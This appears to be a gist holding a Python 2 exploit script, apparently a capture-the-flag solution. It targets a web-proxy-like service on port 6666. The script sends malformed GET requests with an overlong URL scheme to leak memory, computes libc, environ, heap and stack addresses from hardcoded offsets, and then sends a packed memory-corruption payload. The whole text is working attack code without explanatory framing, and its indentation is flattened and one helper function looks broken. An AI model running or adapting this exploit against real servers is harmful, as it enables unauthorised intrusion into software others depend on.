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Last active August 29, 2015 14:17
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import string
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep, time
from sys import argv, exit
def read_noblock(p, n):
ret = p.recv(n)
ret = ''
return ret
def read_until(p, string):
s = ""
while 1:
c = p.recv(1)
s += c
if s[-len(string):] == string:
return s
def read_n(p, n, timeout=-1):
s = ""
start = time()
while len(s) < n:
s += read_noblock(p, 1)
if timeout != -1 and time() - start > timeout:
return s
return s
def xor(s1, s2):
ret = ""
for i in xrange(len(s1)):
ret += chr(ord(s1[i]) ^ ord(s2[i%len(s2)]))
return ret
def recv_resp():
global p
header = read_until(p, "\r\n\r\n")
print header
length = int(header.split("Content-Length: ")[1].split("\n")[0])
return read_n(p, length)
p = None
def main():
global p
p = socket(AF_INET, SOCK_STREAM)
if len(argv) >= 2:
p.connect(("", 6666))
LIBC_OFF = 0x1a6760
ENVIRON_OFF = 0x1a7de0
else :
p.connect(("localhost", 6666))
LIBC_OFF = 0x1aa760
ENVIRON_OFF = 0x1abe00
p.send("GET http://localhost// HTTP/1.0\n\n")
print recv_resp()
p.send("GET http://localhost/// HTTP/1.0\n\n")
print recv_resp()
p.send("GET http://localhost/ HTTP/1.0\n\n")
print recv_resp()
p.send("GET http://localhost// HTTP/1.0\n\n")
print recv_resp()
payload = "a" * 127
p.send("GET {payload}://localhost// HTTP/1.0\n\n".format(payload=payload))
print recv_resp()
p.send("GET http://localhost/// HTTP/1.0\n\n")
res = p.recv(1024)
print [res]
libc = unpack("<I", res[:4])[0] - LIBC_OFF
print "libc:", hex(libc)
environ = libc + ENVIRON_OFF
print "environ:", hex(environ)
heap = unpack("<I", res[8:12])[0]
print "heap:", hex(heap)
p.send("GET http://localhost/ HTTP/1.0\n\n")
print recv_resp()
payload = ""
payload += pack("<I", 0x82d4414f)
payload += pack("<I", environ)
payload += pack("<I", 0x7fffffff)
payload += pack("<I", 0x01010104)
payload += pack("<I", 0xdeadbeef)
payload += pack("<I", 0xfeedface)
p.send("GET {payload}://localhost/ HTTP/1.0\n\n".format(payload=payload))
res = p.recv(1024)
print [res]
stack = unpack("<I", res[1:5])[0]
print "stack:", hex(stack)
if __name__ == "__main__":
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